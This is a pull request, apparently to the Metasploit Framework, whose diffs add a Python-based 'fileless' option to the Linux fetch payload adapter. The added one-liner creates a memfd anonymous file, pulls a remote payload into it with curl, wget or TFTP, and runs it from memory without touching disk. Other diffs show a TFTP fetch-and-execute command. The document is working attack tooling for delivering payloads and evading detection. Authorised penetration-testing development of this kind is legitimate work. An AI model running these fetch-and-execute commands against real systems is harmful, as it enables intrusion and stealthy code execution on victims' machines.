### PR TITLE
Adding option to run fileless ELF execution with Python  

### DIFF
--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -210,6 +210,8 @@ module Msf::Payload::Adapter::Fetch
 
   def _execute_nix(get_file_cmd)
     return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS']
+    return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS_PYTHON']
+
 
     cmds = get_file_cmd
     cmds << ";chmod +x #{_remote_destination_nix}"
@@ -232,6 +234,7 @@ module Msf::Payload::Adapter::Fetch
     end
     _execute_add(get_file_cmd)
   end
+  
 
   # The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains "memfd") with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor
   def _generate_fileless(get_file_cmd)
@@ -257,6 +260,11 @@ module Msf::Payload::Adapter::Fetch
     cmd << '; done'
 
     cmd
+  end
+  
+  # same idea as _generate_fileless function, but force creating anonymous file handle
+  def _generate_fileless_python(get_file_cmd)
+    %Q<python3 -c 'import os, time; fd=os.memfd_create ("", os.MFD_CLOEXEC); os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\"; #{get_file_cmd}; $f &")'> 
   end
 
   def _generate_curl_command
@@ -343,7 +351,7 @@ module Msf::Payload::Adapter::Fetch
   def _remote_destination_nix
     return @remote_destination_nix unless @remote_destination_nix.nil?
 
-    if datastore['FETCH_FILELESS']
+    if datastore['FETCH_FILELESS'] || datastore['FETCH_FILELESS_PYTHON']
       @remote_destination_nix = '$f'
       return @remote_destination_nix
     end

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -210,7 +210,7 @@ module Msf::Payload::Adapter::Fetch
 
   def _execute_nix(get_file_cmd)
     return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS'] == 'bash'
-    return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS'] == 'python3.8'
+    return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS'] == 'python3.8+'
 
 
     cmds = get_file_cmd

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -209,8 +209,8 @@ module Msf::Payload::Adapter::Fetch
   end
 
   def _execute_nix(get_file_cmd)
-    return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS']
-    return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS_PYTHON']
+    return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS'] == 'bash'
+    return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS'] == 'python3.8'
 
 
     cmds = get_file_cmd
@@ -264,7 +264,7 @@ module Msf::Payload::Adapter::Fetch
   
   # same idea as _generate_fileless function, but force creating anonymous file handle
   def _generate_fileless_python(get_file_cmd)
-    %Q<python3 -c 'import os, time; fd=os.memfd_create ("", os.MFD_CLOEXEC); os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\"; #{get_file_cmd}; $f &")'> 
+    %Q<python3 -c 'import os;fd=os.memfd_create("",os.MFD_CLOEXEC);os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\";#{get_file_cmd};$f&")'> 
   end
 
   def _generate_curl_command
@@ -303,7 +303,7 @@ module Msf::Payload::Adapter::Fetch
         fetch_command = _execute_win("tftp -i #{srvhost} GET #{srvuri} #{_remote_destination}")
       else
         _check_tftp_file
-        if datastore['FETCH_FILELESS'] && linux?
+        if datastore['FETCH_FILELESS'] != 'none' && linux?
           return _generate_fileless("(echo binary ; echo get #{srvuri} $f ) | tftp #{srvhost}")
         else
           fetch_command = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
@@ -351,7 +351,7 @@ module Msf::Payload::Adapter::Fetch
   def _remote_destination_nix
     return @remote_destination_nix unless @remote_destination_nix.nil?
 
-    if datastore['FETCH_FILELESS'] || datastore['FETCH_FILELESS_PYTHON']
+    if datastore['FETCH_FILELESS'] != 'none'
       @remote_destination_nix = '$f'
       return @remote_destination_nix
     end

--- a/lib/msf/core/payload/adapter/fetch/linux_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -4,7 +4,7 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
     register_options(
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
-        Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8']]),
+        Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]

--- a/lib/msf/core/payload/adapter/fetch/linux_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -4,8 +4,8 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
     register_options(
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
-        Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false], conditions: ['FETCH_FILELESS_PYTHON','==', 'false']),
-        Msf::OptBool.new('FETCH_FILELESS_PYTHON', [true, 'Attempt to run payload without touching disk using Python3, Python ≥3.8 and Linux ≥3.17 only ', false], conditions: ['FETCH_FILELESS','==', 'false']),
+        Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by looking for anonymous handles, Linux ≥3.17 only', false], conditions: ['FETCH_FILELESS_PYTHON','==', 'false']),
+        Msf::OptBool.new('FETCH_FILELESS_PYTHON', [true, 'Attempt to run payload without touching disk using Python3 and creating anonymous handle, Python ≥3.8 and Linux ≥3.17 only ', false], conditions: ['FETCH_FILELESS','==', 'false']),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]

--- a/lib/msf/core/payload/adapter/fetch/linux_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -4,8 +4,7 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
     register_options(
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
-        Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by looking for anonymous handles, Linux ≥3.17 only', false], conditions: ['FETCH_FILELESS_PYTHON','==', 'false']),
-        Msf::OptBool.new('FETCH_FILELESS_PYTHON', [true, 'Attempt to run payload without touching disk using Python3 and creating anonymous handle, Python ≥3.8 and Linux ≥3.17 only ', false], conditions: ['FETCH_FILELESS','==', 'false']),
+        Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8']]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]

--- a/lib/msf/core/payload/adapter/fetch/linux_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -4,7 +4,8 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
     register_options(
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
-        Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),
+        Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false], conditions: ['FETCH_FILELESS_PYTHON','==', 'false']),
+        Msf::OptBool.new('FETCH_FILELESS_PYTHON', [true, 'Attempt to run payload without touching disk using Python3, Linux ≥3.17 only with Python3 support', false], conditions: ['FETCH_FILELESS','==', 'false']),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]

--- a/lib/msf/core/payload/adapter/fetch/linux_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -5,7 +5,7 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
         Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false], conditions: ['FETCH_FILELESS_PYTHON','==', 'false']),
-        Msf::OptBool.new('FETCH_FILELESS_PYTHON', [true, 'Attempt to run payload without touching disk using Python3, Linux ≥3.17 only with Python3 support', false], conditions: ['FETCH_FILELESS','==', 'false']),
+        Msf::OptBool.new('FETCH_FILELESS_PYTHON', [true, 'Attempt to run payload without touching disk using Python3, Python ≥3.8 and Linux ≥3.17 only ', false], conditions: ['FETCH_FILELESS','==', 'false']),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]


### PR DESCRIPTION
With the report of failing `FETCH_FILELESS` in restricted/no-gui environment, there should be probably some alternative until the more reliable method is available. This PR adds the alternative option. The new method - `FETCH_FILELESS_PYTHON` creates anonymous handle using Python, copies payload into that handle and runs it. The logic/technique is similar to original `FETCH_FILELESS`, but the fetch payload creates its own handle.